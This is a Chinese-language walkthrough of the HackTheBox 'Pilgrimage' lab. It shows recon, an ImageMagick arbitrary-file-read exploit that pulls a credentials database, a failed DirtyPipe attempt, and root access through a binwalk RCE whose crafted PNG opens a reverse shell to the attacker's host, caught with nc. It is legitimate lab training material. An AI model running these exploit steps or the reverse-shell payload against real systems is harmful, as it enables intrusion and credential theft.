Pilgrimage
Machine:Linux
Level:easy
信息收集
nmap
└─# nmap -sV -sC 10.10.11.219
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 20:be:60:d2:95:f6:28:c1:b7:e9:e8:17:06:f1:68:f3 (RSA)
| 256 0e:b6:a6:a8:c9:9b:41:73:74:6e:70:18:0d:5f:e0:af (ECDSA)
|_ 256 d1:4e:29:3c:70:86:69:b4:d7:2c:c8:0b:48:6e:98:04 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Pilgrimage - Shrink Your Images
| http-git:
| 10.10.11.219:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: Pilgrimage image shrinking service initial commit. # Please ...
|_http-server-header: nginx/1.18.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=8/1%OT=22%CT=1%CU=40997%PV=Y%DS=2%DC=T%G=Y%TM=64C8A8E7
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=C)SEQ(
OS:SP=104%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=105%GCD=1%ISR=10A%TI=Z%C
OS:I=Z%TS=B)SEQ(SP=105%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=C)SEQ(SP=106%GCD=1%I
OS:SR=10B%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT1
OS:1NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE
OS:88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=
OS:)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W
OS:=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
OS:T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S
OS:+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUC
OS:K=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 3306/tcp)
HOP RTT ADDRESS
1 323.00 ms 10.10.14.1
2 318.85 ms pilgrimage.htb (10.10.11.219)
gobuster
/index.php (Status: 200) [Size: 7621]
/login.php (Status: 200) [Size: 6166]
/register.php (Status: 200) [Size: 6173]
/logout.php (Status: 302) [Size: 0] [--> /]
/.htpasswd (Status: 403) [Size: 153]
/.htaccess (Status: 403) [Size: 153]
/dashboard.php (Status: 302) [Size: 0] [--> /login.php]
/.htpasswds (Status: 403) [Size: 153]
//.git/ (Status: 403) [Size: 153]
//.git/config (Status: 200) [Size: 92]
//tmp/ (Status: 403) [Size: 153]
//tmp (Status: 301) [Size: 169] [--> http://pilgrimage.htb/tmp/]
//database/.htpasswd (Status: 403) [Size: 153]
手工验证信息
我们发现了.git目录,使用git-dumper获取文件
git-dumper http://pilgrimage.htb/.git ./git
在login.php文件中我们可以发现一些信息
$db = new PDO('sqlite:/var/db/pilgrimage');
$stmt = $db->prepare("SELECT * FROM users WHERE username = ? and password = ?");
还有一个magick文件,我们看看能从中获取什么信息
└─# ./magick -version
Version: ImageMagick 7.1.0-49 beta Q16-HDRI x86_64 c243c9281:20220911 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (7.5)
搜索后发现存在任意文件读取漏洞,在之前的login.php中我们发现数据库的位置,我们可以利用这个漏洞读取数据库
漏洞利用
└─# cat 51261.txt
# Exploit Title: ImageMagick 7.1.0-49 - Arbitrary File Read
# Google Dork: N/A
# Date: 06/02/2023
# Exploit Author: Cristian 'void' Giustini
# Vendor Homepage: https://imagemagick.org/
# Software Link: https://imagemagick.org/
# Version: <= 7.1.0-49
# Tested on: 7.1.0-49 and 6.9.11-60
# CVE : CVE-2022-44268 (CVE Owner: Metabase Q Teamhttps://www.metabaseq.com/imagemagick-zero-days/)
# Exploit pre-requirements: Rust
# PoC : https://github.com/voidz0r/CVE-2022-44268
根据POC的指示,我们生成一个修改过的PNG文件,并将其上传到系统中。下载文件后,我们就可以从修改后的文件中读取/var/db/pilgrimage文件的内容
cargo run "/var/db/pilgrimage"
上传文件,成功之后将文件本地保存
identify -verbose 649756a97443a.png
将数据十六进制解码并保存为.sqlite文件,在文件中我们可以发现账密
| username | password |
|---|---|
| emily | [REDACTED] |
知道账密后我们连接SSH
权限提升
上传linpeas.sh发现DirtyPipe漏洞
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-3490] eBPF ALU32 bounds tracking for bitwise ops
Details: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
Exposure: probable
Tags: ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
Download URL: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2022-0847] DirtyPipe
Details: https://dirtypipe.cm4all.com/
Exposure: probable
Tags: ubuntu=(20.04|21.04),[ debian=11 ]
Download URL: https://haxx.in/files/dirtypipez.c
检查有没有gcc环境,答案是有那就直接利用吧
emily@pilgrimage:~$ gcc --version
gcc (Debian 10.2.1-6) 10.2.1 20210110
Copyright (C) 2020 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
找到一个具有 SUID 权限的可执行文件,然后利用这个文件进行提权
emily@pilgrimage:~$ ./exp /usr/bin/su
[+] hijacking suid binary..
[+] dropping suid shell..
Password:
好吧失败了,那就尝试尝试别的方法
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/08/01 18:46:26 CMD: UID=0 PID=749 | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
2023/08/01 18:46:26 CMD: UID=0 PID=734 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2023/08/01 18:46:26 CMD: UID=0 PID=727 | /bin/bash /usr/sbin/malwarescan.sh
2023/08/01 18:46:26 CMD: UID=0 PID=726 | /usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/
2023/08/01 18:46:26 CMD: UID=0 PID=714 | /lib/systemd/systemd-logind
2023/08/01 18:46:26 CMD: UID=0 PID=709 | /usr/sbin/rsyslogd -n -iNONE
2023/08/01 18:46:26 CMD: UID=0 PID=707 | php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)
2023/08/01 18:46:26 CMD: UID=0 PID=705 | /bin/bash /usr/sbin/malwarescan.sh
2023/08/01 18:46:26 CMD: UID=103 PID=700 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2023/08/01 18:46:26 CMD: UID=0 PID=698 | /usr/sbin/cron -f
2023/08/01 18:46:26 CMD: UID=0 PID=653 | /sbin/dhclient -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
这里我们发现了一个root权限的.sh文件
#!/bin/bash
blacklist=("Executable script" "Microsoft executable")
/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
binout="$(/usr/local/bin/binwalk -e "$filename")"
for banned in "${blacklist[@]}"; do
if [[ "$binout" == *"$banned"* ]]; then
/usr/bin/rm "$filename"
break
fi
done
done
对文件分析后我们可以发现这个.sh脚本的主要目的是监视指定目录中创建的新文件,并根据预定义的文件类型黑名单进行过滤,如果新文件的内容与黑名单中的任何项匹配,它将被立即删除。其中第5行的$filename是我们可以控制的,搜一下看binwalk是否有漏洞可以利用,搜索发现一个RCE。
emily@pilgrimage:~$ binwalk -h
Binwalk v2.3.2
Craig Heffner, ReFirmLabs
https://github.com/ReFirmLabs/binwalk
随便找个图片,执行图中的RCE
python 51249.py exp.png 10.10.14.29 1234
先监听端口,然后上传至/var/www/pilgrimage.htb/shrunk
└─# nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.11.219] 52296
whoami
root